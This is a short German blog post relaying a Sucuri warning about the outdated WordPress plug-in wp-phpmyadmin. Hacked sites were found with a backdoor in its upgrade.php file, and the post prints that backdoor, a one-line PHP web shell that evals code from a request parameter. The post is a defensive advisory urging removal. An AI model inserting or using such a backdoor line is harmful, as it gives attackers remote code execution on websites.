wp-phpmyadmin Plug-In – Jetzt löschen!

Nutzt du das WordPress Plug-In WP-phpmyadmin? Dann solltest du es jetzt laut den Sucuri Experten sofort löschen. Die Security Experten haben verschiedenen Seiten gesehen welche durch die Nutzung von wp-phpmyadmin gehackt wurden.
Der Angriff hat durch eine Backdoor statt gefunden, der folgende Code befand sich in der upgrade.php Datei:

<?php if(isset($_REQUEST["asc"]))eval(stripslashes($_REQUEST["asc"])); ?>

Dieser Teil ist laut Sucuri nicht Bestandteil des Plug-Ins und erlaubt den Remote Zugriff auf die WordPress Installation.

Das Plug-In soll Zugriff auf phpMyAdmin direkt aus WordPress heraus geben, ist aber schon seit einigen Jahren nicht mehr upgedatet worden. Bitte prüfen ob ihr das Plug nutzt und wenn ja ggf. entfernen!

Sucuri

Ein Kommentar

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert

eMail-Benachrichtigung bei Kommentaren. Auch möglich: Abo ohne Kommentar.